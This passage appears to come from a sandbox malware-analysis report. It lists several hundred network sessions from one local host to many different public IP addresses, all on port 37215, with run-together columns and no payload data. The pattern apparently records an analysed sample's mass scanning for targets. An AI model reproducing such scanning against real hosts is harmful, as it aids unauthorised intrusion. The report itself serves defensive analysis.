                                              17083192.168.2.1540514121.113.229.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17084192.168.2.1542602197.176.80.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17085192.168.2.1549754181.38.36.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17086192.168.2.1556262222.94.37.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17087192.168.2.1554994190.182.108.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17088192.168.2.1542428102.239.209.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17089192.168.2.1534372102.243.87.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17090192.168.2.1532802122.118.137.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17091192.168.2.153657841.233.236.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17092192.168.2.1545018138.255.3.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17093192.168.2.1539080122.13.200.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17094192.168.2.1540182186.53.189.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17095192.168.2.1537622186.18.143.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17096192.168.2.15406528.202.95.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17097192.168.2.1559908102.168.211.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17098192.168.2.156030494.39.135.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17099192.168.2.153745694.181.129.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17100192.168.2.1536006186.179.227.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17101192.168.2.1551532157.133.17.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17102192.168.2.1539086190.160.241.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17103192.168.2.155089237.235.102.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17104192.168.2.1560464190.182.49.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17105192.168.2.1559678138.246.235.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17106192.168.2.1535214156.111.117.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17107192.168.2.155762831.176.164.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17108192.168.2.1533126197.128.117.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17109192.168.2.1558070222.116.49.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17110192.168.2.1557964138.50.0.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17111192.168.2.1550036186.46.165.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17112192.168.2.1558974131.190.194.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17113192.168.2.1547022222.163.87.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17114192.168.2.154740231.40.157.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17115192.168.2.155341837.232.188.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17116192.168.2.154680637.148.23.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17117192.168.2.1548140186.148.197.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17118192.168.2.1543748122.147.68.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17119192.168.2.153602231.124.207.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17120192.168.2.1558110138.158.23.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17121192.168.2.1548598186.42.152.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17122192.168.2.1538356156.245.82.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17123192.168.2.154739487.160.30.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17124192.168.2.1550334188.227.202.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17125192.168.2.1551612186.36.77.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17126192.168.2.154671839.21.14.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17127192.168.2.1559348122.188.122.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17128192.168.2.1535974138.130.130.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17129192.168.2.1545130222.249.192.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17130192.168.2.1553876102.251.189.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17131192.168.2.155855637.164.147.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17132192.168.2.155627637.242.117.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17133192.168.2.154262645.218.243.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17134192.168.2.1544140181.121.206.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17135192.168.2.1557496181.198.121.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17136192.168.2.155788031.213.140.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17137192.168.2.1551474181.233.16.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17138192.168.2.1553102197.240.29.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17139192.168.2.153595045.78.177.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17140192.168.2.154635241.66.251.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17141192.168.2.1534952102.165.35.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17142192.168.2.1549380125.200.176.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17143192.168.2.1533180181.173.88.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17144192.168.2.1541910186.30.252.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17145192.168.2.1551334222.86.64.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17146192.168.2.153983845.0.67.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17147192.168.2.153825245.32.148.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17148192.168.2.1546772121.201.59.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17149192.168.2.1555482102.160.22.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17150192.168.2.155831837.197.212.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17151192.168.2.1551734190.74.173.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17152192.168.2.1559238138.138.224.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17153192.168.2.1555922138.180.43.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17154192.168.2.154685094.67.73.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17155192.168.2.155743431.72.68.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17156192.168.2.1558936186.120.196.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17157192.168.2.1550220154.91.149.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17158192.168.2.1552512149.220.78.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17159192.168.2.1535066122.115.253.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17160192.168.2.1547708190.140.172.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17161192.168.2.1553904156.75.212.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17162192.168.2.1537886102.78.74.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17163192.168.2.1558018122.80.110.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17164192.168.2.1542396121.213.235.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17165192.168.2.1551506122.128.56.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17166192.168.2.1549816222.36.56.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17167192.168.2.1538316156.121.236.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17168192.168.2.1554304186.234.241.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17169192.168.2.1547900222.103.154.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17170192.168.2.1560398122.107.19.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17171192.168.2.153898660.79.166.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17172192.168.2.153386294.250.112.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17173192.168.2.1533698102.47.194.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17174192.168.2.1558278157.125.132.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17175192.168.2.1538184157.147.250.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17176192.168.2.1555366181.136.232.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17177192.168.2.154512037.160.197.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17178192.168.2.1547698121.57.139.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17179192.168.2.153346237.236.32.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17180192.168.2.1548832122.250.110.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17181192.168.2.1543900190.197.20.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17182192.168.2.1552686197.49.243.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17183192.168.2.153367645.242.235.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17184192.168.2.155675245.69.224.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17185192.168.2.1537456190.230.221.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17186192.168.2.153353041.182.19.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17187192.168.2.153976237.46.32.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17188192.168.2.1543926181.109.210.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17189192.168.2.1540418156.229.244.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17190192.168.2.1540918190.2.92.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17191192.168.2.1547726121.61.222.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17192192.168.2.1547602122.49.20.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17193192.168.2.1541888205.134.13.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17194192.168.2.155075845.230.188.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17195192.168.2.154195037.68.106.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17196192.168.2.1542566181.95.69.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17197192.168.2.1557056122.188.19.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17198192.168.2.153971437.124.200.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17199192.168.2.1557828156.86.77.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17200192.168.2.1560790181.32.93.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17201192.168.2.1558410181.35.49.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17202192.168.2.1557808102.202.223.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17203192.168.2.154723094.36.151.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17204192.168.2.1546328156.56.215.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17205192.168.2.154047637.38.43.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17206192.168.2.154668837.77.108.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17207192.168.2.153476894.79.126.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17208192.168.2.1545000186.96.67.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17209192.168.2.1553228138.166.110.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17210192.168.2.1554680190.185.74.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17211192.168.2.154571094.55.159.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17212192.168.2.154894245.116.233.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17213192.168.2.1538182190.121.37.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17214192.168.2.153306641.210.16.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17215192.168.2.1558542121.155.150.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17216192.168.2.1551102181.9.43.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17217192.168.2.1539844121.186.215.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17218192.168.2.154257294.24.189.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17219192.168.2.155482837.44.5.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17220192.168.2.154975437.29.246.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17221192.168.2.1548786157.1.12.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17222192.168.2.1548236157.240.192.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17223192.168.2.1556950102.25.3.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17224192.168.2.153636845.174.7.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17225192.168.2.1555666157.207.9.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17226192.168.2.1534924186.85.231.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17227192.168.2.1547338156.153.183.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17228192.168.2.1557092121.192.53.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17229192.168.2.1546724156.132.236.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17230192.168.2.1556846122.50.8.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17231192.168.2.1555426138.70.147.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17232192.168.2.1551486122.142.62.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17233192.168.2.1539506107.85.91.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17234192.168.2.1557428156.72.122.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17235192.168.2.1560136222.41.210.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17236192.168.2.1542320157.237.104.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17237192.168.2.1539160186.81.43.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17238192.168.2.1560316190.65.147.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17239192.168.2.1552460181.234.173.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17240192.168.2.153376894.145.178.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17241192.168.2.1552186197.202.212.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17242192.168.2.1532806190.30.42.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17243192.168.2.155603037.235.173.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17244192.168.2.154682241.181.95.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17245192.168.2.1551286122.252.140.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17246192.168.2.1558864156.183.222.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17247192.168.2.1554906102.166.147.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17248192.168.2.1556726102.11.12.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17249192.168.2.154407841.150.2.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17250192.168.2.153516641.144.108.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17251192.168.2.156072645.226.58.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17252192.168.2.1537592186.52.5.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17253192.168.2.1534586138.190.3.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17254192.168.2.153743037.59.128.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17255192.168.2.1550366190.135.8.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17256192.168.2.154213431.105.220.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17257192.168.2.155082841.124.169.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17258192.168.2.1553802121.167.175.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17259192.168.2.1533234122.6.199.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17260192.168.2.1548384138.101.167.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17261192.168.2.1546534222.247.201.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17262192.168.2.1541610197.144.31.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17263192.168.2.1549690190.235.48.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17264192.168.2.1546298156.63.230.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17265192.168.2.1555066138.36.167.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17266192.168.2.1555480144.189.236.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17267192.168.2.1558510121.202.122.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17268192.168.2.1559394138.210.143.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17269192.168.2.1535202156.187.135.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17270192.168.2.153750841.242.161.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17271192.168.2.154787231.158.52.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17272192.168.2.1543544121.3.144.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17273192.168.2.1543048102.179.72.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17274192.168.2.1539754157.10.171.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17275192.168.2.154231641.134.130.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17276192.168.2.153762631.86.57.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17277192.168.2.154377245.191.157.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17278192.168.2.1535812190.39.210.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17279192.168.2.1536400186.255.139.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17280192.168.2.1534556188.193.154.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17281192.168.2.154353251.167.118.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17282192.168.2.154049837.184.97.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17283192.168.2.156070031.165.97.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17284192.168.2.1555814157.74.115.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17285192.168.2.155303637.186.252.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17286192.168.2.1534882186.14.223.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17287192.168.2.153354431.185.96.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17288192.168.2.1536028181.116.72.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17289192.168.2.1537704186.56.212.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17290192.168.2.1552352122.198.77.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17291192.168.2.1541668187.159.37.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17292192.168.2.1558514138.188.184.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17293192.168.2.155910041.74.139.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17294192.168.2.1558944102.201.63.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17295192.168.2.1559538157.194.104.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17296192.168.2.1536150190.80.42.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17297192.168.2.1560188138.103.190.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17298192.168.2.153309041.242.245.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17299192.168.2.154894845.1.191.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17300192.168.2.1557948222.252.145.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17301192.168.2.1553536122.129.99.2137215
